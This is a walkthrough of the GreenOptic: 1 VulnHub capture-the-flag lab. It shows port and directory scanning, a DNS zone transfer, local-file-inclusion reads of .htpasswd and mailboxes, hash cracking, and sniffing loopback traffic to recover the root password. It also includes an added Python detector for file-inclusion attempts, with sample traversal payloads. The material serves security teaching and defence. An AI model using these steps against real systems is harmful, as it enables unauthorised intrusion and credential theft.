GreenOptic: 1 vulnhub walkthrough
2022-08-02 03:25:00 【xdeclearn】
GreenOptic: 1
Download: http://www.vulnhub.com/entry/greenoptic-1,510/
1. Port scan
Open ports; the target runs CentOS 7.
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
53/tcp open domain ISC BIND 9.11.4-P2 (RedHat Enterprise Linux 7)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
10000/tcp open http MiniServ 1.953 (Webmin httpd)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7
2. Vulnerable services
Nothing of value is served on port 80.
A gobuster directory scan found the directory account.
┌──(kali㉿kali)-[~/Documents/tools]
└─$ ./gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.56.102
/img (Status: 301) [Size: 234] [--> http://192.168.56.102/img/]
/account (Status: 301) [Size: 238] [--> http://192.168.56.102/account/]
Browsing that directory lands on http://192.168.56.102/account/index.php?include=cookiewarning, and testing the include parameter shows a local file inclusion. Since the system is CentOS 7, the default Apache logs are /etc/httpd/logs/access_log and /etc/httpd/logs/error_log, but neither could be read, and several other common log paths failed as well. Reading /etc/hostname gives the hostname websrv01.greenoptic.vm, so the guess is that Apache restricts access by host name. Since the server also runs a DNS service, dig is used to pull every record under the greenoptic.vm zone.
┌──(kali㉿kali)-[~]
└─$ dig @192.168.56.102 greenoptic.vm axfr
; <<>> DiG 9.16.8-Debian <<>> @192.168.56.102 greenoptic.vm axfr
; (1 server found)
;; global options: +cmd
greenoptic.vm. 3600 IN SOA websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
greenoptic.vm. 3600 IN NS ns1.greenoptic.vm.
ns1.greenoptic.vm. 3600 IN A 127.0.0.1
recoveryplan.greenoptic.vm. 3600 IN A 127.0.0.1
websrv01.greenoptic.vm. 3600 IN A 127.0.0.1
greenoptic.vm. 3600 IN SOA websrv01.greenoptic.vm. root.greenoptic.vm. 1594567384 3600 600 1209600 3600
;; Query time: 0 msec
;; SERVER: 192.168.56.102#53(192.168.56.102)
;; WHEN: Tue Nov 24 07:37:44 EST 2020
;; XFR size: 6 records (messages 1, bytes 235)
This yields another host name; after adding it to hosts and browsing to it, the site asks for Basic auth. Once common weak passwords failed, gobuster was run against the restricted site with common.txt to enumerate access-restricted files.
┌──(kali㉿kali)-[~/Documents/tools]
└─$ ./gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://recoveryplan.greenoptic.vm --wildcard|grep "Status: 403"
/.hta (Status: 403) [Size: 206]
/.htaccess (Status: 403) [Size: 211]
/.htpasswd (Status: 403) [Size: 211]
/cache (Status: 403) [Size: 207]
/cgi-bin/ (Status: 403) [Size: 210]
/config (Status: 403) [Size: 208]
/files (Status: 403) [Size: 207]
/includes (Status: 403) [Size: 210]
/store (Status: 403) [Size: 207]
Reading /.htaccess through the local file inclusion:
Authtype Basic
AuthName "Restricted area"
AuthUserFile /var/www/.htpasswd
Require valid-user
Following that pointer, /var/www/.htpasswd is read and yields the hashed credential:
staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.
john with rockyou.txt cracks it to staff:wheeler, which passes Basic auth and leads to a phpBB board. Following the hint in the "key information" post, the local file inclusion is used to read terry's mailbox at /var/mail/terry and sam's mailbox at /var/mail/sam, and dpi.zip is downloaded.
From [email protected] Sun Jul 12 15:52:19 2020
Return-Path: <[email protected]>
X-Original-To: terry
Delivered-To: [email protected]
Received: from localhost (localhost [IPv6:::1])
by websrv01.greenoptic.vm (Postfix) with ESMTP id C54E21090083
for <terry>; Sun, 12 Jul 2020 15:51:32 +0100 (BST)
Message-Id: <[email protected]>
Date: Sun, 12 Jul 2020 15:51:32 +0100 (BST)
From: [email protected]
Terry
As per your request we have installed phpBB to help with incident response.
Your username is terry, and your password is wsllsa!2
Let us know if you have issues
Server Support - Linux
From [email protected] Sun Jul 12 16:13:45 2020
Return-Path: <[email protected]>
X-Original-To: sam
Delivered-To: [email protected]
Received: from localhost (localhost [IPv6:::1])
by websrv01.greenoptic.vm (Postfix) with ESMTP id A8D371090085
for <sam>; Sun, 12 Jul 2020 16:13:18 +0100 (BST)
Message-Id: <[email protected]>
Date: Sun, 12 Jul 2020 16:13:18 +0100 (BST)
From: [email protected]
Hi Sam, per the team message, the password is HelloSunshine123
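Every file read so far (/etc/hostname, /.htaccess, /var/www/.htpasswd and the two mailboxes) went through the include parameter of account/index.php, so that parameter is the natural thing to watch in the web server's access log. The following is an added example, not part of the original walkthrough: it parses Apache combined-format access_log lines and flags include values that are absolute paths, traversal sequences or stream wrappers instead of one of the expected page names. The ALLOWED_INCLUDES set and the sample log lines are constructed for the example.

```python
# Added example (not from the original walkthrough): flag local-file-inclusion
# attempts against /account/index.php?include=... in Apache access_log lines.
import re
from urllib.parse import parse_qs, unquote, urlparse
# Page names the include parameter is expected to load (assumed allowlist).
ALLOWED_INCLUDES = {"cookiewarning", "login", "register"}
# Apache combined log format; only client IP, request path and status are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
# Traversal, absolute path, stream wrapper or NUL byte in the include value.
SUSPICIOUS = re.compile(r"\.\./|^/|^[a-z]+://|\x00", re.IGNORECASE)

def classify_include(value):
    """Return why an include value is suspicious, or None if it is allowed."""
    v = unquote(value)  # parse_qs already decoded once; catch double-encoding
    if v in ALLOWED_INCLUDES:
        return None
    if SUSPICIOUS.search(v):
        return "traversal/absolute path/wrapper"
    return "not in allowlist"

def scan_log(lines):
    """Return (client_ip, include_value, reason) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m.group("path"))
        if not url.path.endswith("/account/index.php"):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get("include", []):
            reason = classify_include(value)
            if reason:
                hits.append((m.group("ip"), value, reason))
    return hits

# Constructed sample lines modelled on the reads performed in this walkthrough.
SAMPLE_LOG = [
    '192.168.56.1 - - [24/Nov/2020:07:30:01 -0500] "GET /account/index.php?include=cookiewarning HTTP/1.1" 200 512',
    '192.168.56.1 - - [24/Nov/2020:07:31:12 -0500] "GET /account/index.php?include=/etc/hostname HTTP/1.1" 200 26',
    '192.168.56.1 - - [24/Nov/2020:07:40:09 -0500] "GET /account/index.php?include=../../../../var/www/.htpasswd HTTP/1.1" 200 61',
    '192.168.56.1 - - [24/Nov/2020:07:41:33 -0500] "GET /account/index.php?include=%2Fvar%2Fmail%2Fterry HTTP/1.1" 200 900',
    '192.168.56.1 - - [24/Nov/2020:07:42:00 -0500] "GET /img/logo.png HTTP/1.1" 200 2048',
]
if __name__ == "__main__":
    for ip, value, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} include={value!r}: {reason}")
```

The same allowlist check, applied server-side before the file is included, is the fix that closes this hole rather than just detecting it.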
dpi.zip is extracted with that password and dpi.pcap is opened in Wireshark; filtering on the ftp protocol reveals a new credential, alex:FwejAASD1. Logging in over SSH gives the first shell.
┌──(kali㉿kali)-[~]
└─$ ssh [email protected]
The authenticity of host '192.168.56.102 (192.168.56.102)' can't be established.
ECDSA key fingerprint is SHA256:D96eRXXFR5bMxuGFCt8OvBzYYZjHSpu+ksPl5jliY80.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.102' (ECDSA) to the list of known hosts.
[email protected]'s password:
[[email protected] ~]$ id
uid=1002(alex) gid=1002(alex) groups=1002(alex),994(wireshark)
[[email protected] ~]$ whoami
alex
[[email protected] ~]$ ls
user.txt
[[email protected] ~]$ cat user.txt
Well done. Now to try and get root access.
Think outside of the box!
(As a side note, there is another way to get a shell: this phpBB version has a remote command execution vulnerability, and the account from the mail can log in as administrator.)
3. Getting root
alex's home directory contains a .wireshark folder, and alex is also a member of the wireshark group.
[[email protected] ~]$ ls -all
total 20
drwx------. 3 alex alex 136 Jul 12 22:12 .
drwxr-xr-x. 6 root root 57 Jul 12 22:12 ..
lrwxrwxrwx. 1 root root 9 Jul 12 22:12 .bash_history -> /dev/null
-rw-r--r--. 1 alex alex 18 Apr 1 2020 .bash_logout
-rw-r--r--. 1 alex alex 193 Apr 1 2020 .bash_profile
-rw-r--r--. 1 alex alex 231 Apr 1 2020 .bashrc
-rwx------. 1 alex alex 70 Jul 12 22:06 user.txt
drwxr-xr-x. 2 alex alex 41 Jul 12 21:33 .wireshark
-rw-------. 1 alex alex 100 Jul 12 20:50 .Xauthority
[[email protected] ~]$ cat /etc/group|grep wireshark
wireshark:x:994:alex
So dumpcap is used to capture on the loopback interface for a while; the capture is downloaded and opened locally in Wireshark.
[[email protected] ~]$ dumpcap -w test.pcap -i lo
Capturing on 'Loopback'
File: test.pcap
Packets captured: 42
Packets received/dropped on interface 'Loopback': 42/0 (pcap:0/dumpcap:0/flushed:0) (100.0%)
An Auth packet shows up; base64-decoding it gives the root password ASfojoj2eozxczzmedlmedASASDKoj3o.
[[email protected] ~]$ su - root
Password:
[[email protected] ~]# cat root.txt
Congratulations on getting root!
[ASCII-art GreenOptic banner]
You've overcome a series of difficult challenges, so well done!
I'm happy to make my CTFs available for free. If you enjoyed doing the CTF, please leave a comment on my blog at https://security.caerdydd.wales - I will be happy for your feedback so I can improve them and make them more enjoyable in the future.
*********
Kindly place your vote on the poll located here to let me know how difficult you found it: https://security.caerdydd.wales/greenoptic-ctf/
*********
Thanks,
bootlesshacker
4. Key takeaways
- gobuster for brute-forcing directories, sub-directories and files
- dig axfr to pull every sub-domain of a zone from its name server